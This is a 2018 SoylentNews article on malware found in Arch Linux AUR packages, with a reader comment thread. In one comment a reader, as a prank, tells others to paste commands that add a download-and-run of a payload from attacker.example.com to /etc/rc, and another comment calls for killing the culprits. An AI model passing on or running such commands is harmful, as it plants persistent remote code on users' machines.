Stories
Slash Boxes
Comments

SoylentNews is people

posted by mrpg on Thursday July 12 2018, @09:40AM   Printer-friendly
from the allows-anyone-to-take-over dept.

Submitted via IRC for Fnord666

[...] Malware has been discovered in at least three Arch Linux packages available on AUR (Arch User Repository), the official Arch Linux repository of user-submitted packages.

[...] The incident happened because AUR allows anyone to take over "orphaned" repositories that have been abandoned by their original authors.

[...] According to a Git commit to the package's source code, xeactor added malicious code that would download a file named "~x" from ptpb.pw, a lightweight site mimicking Pastebin that allows users to share small pieces of texts.

[...] Besides downloading ~u, the main purpose of the first file (~x) was also to modify systemd and add a timer to run the ~u file at every 360 seconds.

[...] No other malicious actions were observed, meaning the acroread package wasn't harming users' systems, but merely collecting data in preparation for... something else.

Source: Malware Found in Arch Linux AUR Package Repository


Original Submission

This discussion has been archived. No new comments can be posted.
Display Options Threshold/Breakthrough Mark All as Read Mark All as Unread
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.
(1)
  • (Score: 1, Insightful) by Anonymous Coward on Thursday July 12 2018, @09:58AM (7 children)

    by Anonymous Coward on Thursday July 12 2018, @09:58AM (#706151)

    AUR is a user maintained repository, clearly stated in bold text on the front page.

    Always review pkgbuild and patch files.

    • (Score: 5, Insightful) by Anonymous Coward on Thursday July 12 2018, @10:27AM (3 children)

      by Anonymous Coward on Thursday July 12 2018, @10:27AM (#706156)

      This is a big deal. Common repositories like this one - even with a disclaimer (what software doesn't deny liability and accountability?) - should be trustworthy. The fact that this instance hasn't done any harm yet is just a matter of timing and good fortune.

      Maybe this was just a trail balloon, or it was laying the foundation for something bigger.

      Always review pkgbuild and patch files.

      if every user is expected to be knowledgeable enough to identify issues reviewing packages before they're installed the current Linux install base will shrink a lot.

      • (Score: 0) by Anonymous Coward on Thursday July 12 2018, @11:02AM

        by Anonymous Coward on Thursday July 12 2018, @11:02AM (#706165)

        if every user

        Most users will use the official, binary package repository.

        reviewing packages

        It's more akin to the BSD ports system. Nothing difficult about reviewing a typical pkgbuild [archlinux.org]

      • (Score: 4, Insightful) by pD-brane on Thursday July 12 2018, @11:21AM

        by pD-brane (6728) on Thursday July 12 2018, @11:21AM (#706168)

        But it is not an official repository. There is no reason to trust the AUR. Moreover, even proprietary software is allowed in the AUR, so I don't understand why anyone would trust this repository.

        Not everyone cares about the number of users. Therefore, I will here try to present a group of users different from those adhering to "The bigger installed base the better!". I would like to use a secure operating system with trusted repositories. Possibly Arch Linux without AUR is that. If I really need something that's provided by AUR, I review the build scripts and/or make a judgement call based on e.g. who signed the package.

        There is no absolute, though. I am using OpenBSD's packages (different from ports), all free software. I don't think there are big risks with this; packages [openbsd.org] are actually of a high quality, but by definition it is not part of the base system.

      • (Score: 3, Touché) by http on Thursday July 12 2018, @09:12PM

        by http (1920) on Thursday July 12 2018, @09:12PM (#706363)

        This is Arch, not Ubuntu. They do their best in so many ways keep noobs from installing linux.

        --
        I browse at -1 when I have mod points. It's unsettling.
    • (Score: 1, Informative) by Anonymous Coward on Thursday July 12 2018, @10:31AM (2 children)

      by Anonymous Coward on Thursday July 12 2018, @10:31AM (#706157)

      http://slackbuilds.org/ [slackbuilds.org]
      Our goal is to have the largest collection of SlackBuild scripts available while still ensuring that they are of the highest quality - we test every submission prior to inclusion in the repository.

      • (Score: 0) by Anonymous Coward on Thursday July 12 2018, @01:18PM (1 child)

        by Anonymous Coward on Thursday July 12 2018, @01:18PM (#706186)

        systemd free

        • (Score: 2) by DannyB on Thursday July 12 2018, @02:13PM

          by DannyB (5839) Subscriber Badge on Thursday July 12 2018, @02:13PM (#706202) Journal

          . . . of any worthwhile reason to exist.

          --
          The lower I set my standards the more accomplishments I have.
  • (Score: 1, Funny) by Deeo Kain on Thursday July 12 2018, @11:19AM (8 children)

    by Deeo Kain (5848) on Thursday July 12 2018, @11:19AM (#706167)

    Besides downloading ~u, the main purpose of the first file (~x) was also to modify systemd

    When something smells fishy, there's always systemd involved.

    • (Score: 2) by jasassin on Thursday July 12 2018, @12:49PM (3 children)

      by jasassin (3566) <jasassin@gmail.com> on Thursday July 12 2018, @12:49PM (#706179) Homepage Journal

      Besides downloading ~u, the main purpose of the first file (~x) was also to modify systemd
      When something smells fishy, there's always systemd involved.

      Just curious... what's the difference between a malicious payload modifying inetd or inetd.conf or making a new crontab entry?

      It just seems to me systemd doesn't have much to do with this.

      --
      jasassin@gmail.com GPG Key ID: 0xE6462C68A9A3DB5A
      • (Score: 2) by Deeo Kain on Thursday July 12 2018, @03:19PM (2 children)

        by Deeo Kain (5848) on Thursday July 12 2018, @03:19PM (#706233)

        When was it the last time a system was compromised because a sysv init script or init itself was hacked?

        • (Score: 2) by unauthorized on Thursday July 12 2018, @05:51PM (1 child)

          by unauthorized (3776) on Thursday July 12 2018, @05:51PM (#706283)

          Type the following in your terminal to find out:

          echo "wget attacker.example.com/~u > /tmp/.payload" >> /etc/rc
          echo "chmod +x /tmp/.payload" >> /etc/rc
          echo "/tmp/.payload" >> /etc/rc
          date

          • (Score: 2) by Pav on Friday July 13 2018, @02:17AM

            by Pav (114) on Friday July 13 2018, @02:17AM (#706466)

            bash: /etc/rc: Permission denied

            BTW, I do know the real problem is a missing /usr/lib/humour.so

    • (Score: 3, Informative) by unauthorized on Thursday July 12 2018, @12:50PM (2 children)

      by unauthorized (3776) on Thursday July 12 2018, @12:50PM (#706181)

      You can do the same thing with an init script. Every init system is vulnerable to attacks from a local root account.

      • (Score: 2) by Deeo Kain on Thursday July 12 2018, @03:23PM (1 child)

        by Deeo Kain (5848) on Thursday July 12 2018, @03:23PM (#706235)

        No, you cannot. Init is so simple, it's rock solid.
        systemd on the other hand is such a convoluted, exceedingly complicated and overengineered piece of crapsoftware it's ripe with security and manageability issues.

        • (Score: 2) by HiThere on Thursday July 12 2018, @05:59PM

          by HiThere (866) Subscriber Badge on Thursday July 12 2018, @05:59PM (#706286) Journal

          The complexity of systemd is a good reason to be skeptical of it. There are others. But your argument that initd is invulnerable to local root based attacks is just foolish. Local root can do *anything* to the system (that isn't overridden by boot time firmware).

          --
          Javascript is what you use to allow unknown third parties to run software you have no idea about on your computer.
    • (Score: 3, Insightful) by darkfeline on Thursday July 12 2018, @08:54PM

      by darkfeline (1030) on Thursday July 12 2018, @08:54PM (#706355) Homepage

      Please stop this, you're making people who have reasonable complaints about systemd look bad.

      Blindly running malicious code on your computer has got nothing to do with systemd, just like blindly running malicious code on your computer has got nothing to do with initscripts if the malicious code plants itself in /etc/init.d/, or with OpenRC and /etc/rc.d.

      --
      Join the SDF Public Access UNIX System today!
  • (Score: 2) by DannyB on Thursday July 12 2018, @02:20PM (7 children)

    by DannyB (5839) Subscriber Badge on Thursday July 12 2018, @02:20PM (#706205) Journal

    It's a good thing that nothing bad [networkworld.com] could happen to Gentoo, which is what Google's Chrome OS is based on.

    --
    The lower I set my standards the more accomplishments I have.
    • (Score: 5, Funny) by takyon on Thursday July 12 2018, @04:33PM (6 children)

      by takyon (881) <takyonNO@SPAMsoylentnews.org> on Thursday July 12 2018, @04:33PM (#706257) Journal

      Switch to Microsoft Windows Linux [wikipedia.org], bro. It's got this new and improved "closed source" security model. Check it out!

      --
      [SIG] 10/28/2017: Soylent Upgrade v14 [soylentnews.org]
      • (Score: 3, Insightful) by DannyB on Thursday July 12 2018, @05:27PM (1 child)

        by DannyB (5839) Subscriber Badge on Thursday July 12 2018, @05:27PM (#706276) Journal

        The bad thing about WSL is that it is Microsoft Linux. So you use WSL and develop your Linux application. You go to deploy it in production on genuine Linux and it doesn't work due to some subtle incompatibility. "Oh, well" management says "we'll just deploy it on Windows in production."

        --
        The lower I set my standards the more accomplishments I have.
        • (Score: 0) by Anonymous Coward on Friday July 13 2018, @01:42AM

          by Anonymous Coward on Friday July 13 2018, @01:42AM (#706444)

          That happened to you? Or whom?

      • (Score: 2, Interesting) by realDonaldTrump on Thursday July 12 2018, @10:53PM (3 children)

        by realDonaldTrump (6614) on Thursday July 12 2018, @10:53PM (#706394) Homepage Journal

        Great company, one of the biggest. And maybe they can help us close up that internet too. We're losing so many people to internet!

        • (Score: 2) by Runaway1956 on Friday July 13 2018, @02:54PM (2 children)

          by Runaway1956 (2926) Subscriber Badge on Friday July 13 2018, @02:54PM (#706643) Journal

          Babbling again? WTF did you just say? No - forget that. WTF did you mean?

          • (Score: 2) by realDonaldTrump on Friday July 13 2018, @03:44PM (1 child)

            by realDonaldTrump (6614) on Friday July 13 2018, @03:44PM (#706656) Homepage Journal

            Microsoft, one of our great cyber companies, one of the biggest. They have made tremendous progress and the future of the Microsoft is very bright. Especially since they got .@BillGates [twitter.com] out as Chairman. Now they're doing "'closed source' security." And we want that for our internet, to help close up our internet. We have ISIS on our internet, we have sex traffickers on our internet. And we're losing many people. China closed up their internet (Golden Shield) and it's been PERFECTO for them. And we're moving very strongly on that one. Very strongly!

            • (Score: 2) by Runaway1956 on Friday July 13 2018, @04:18PM

              by Runaway1956 (2926) Subscriber Badge on Friday July 13 2018, @04:18PM (#706676) Journal

              Uhhh, ohkay - you're some kind of gullible fool.

              Did you know that Microsoft operating systems are unique? All OTHER operating systems were built on top of security. That is, everything is owned by someone, whether it be root, or a user, or SYSTEM - everything is owned, and no one can take it, or use it. Microsoft? Everything that passes for "security" is just bolted on, as an after thought.

              Microsoft security is an oxymoron, just like military intelligence.

  • (Score: -1, Flamebait) by Anonymous Coward on Thursday July 12 2018, @04:58PM (1 child)

    by Anonymous Coward on Thursday July 12 2018, @04:58PM (#706269)

    Find the pricks responsible for this.

    And kill them.

    Please.

    Humanity will thank you.

    • (Score: 0) by Anonymous Coward on Friday July 13 2018, @06:18PM

      by Anonymous Coward on Friday July 13 2018, @06:18PM (#706720)

      i tend to agree, but this might have been meant as a friendly warning to aur users.

  • (Score: 2) by requerdanos on Thursday July 12 2018, @08:44PM

    by requerdanos (5997) Subscriber Badge on Thursday July 12 2018, @08:44PM (#706350) Journal

    No other malicious actions were observed, meaning the acroread package wasn't harming users' systems

    FYI, "acroread" is the Adobe brand Acrobat reader for PDF files (the one that features the exploit of the day/week/month sort of like the Radio Shack free battery of the month club). Saying it's not harmful is either very naive or simply misleading.

(1)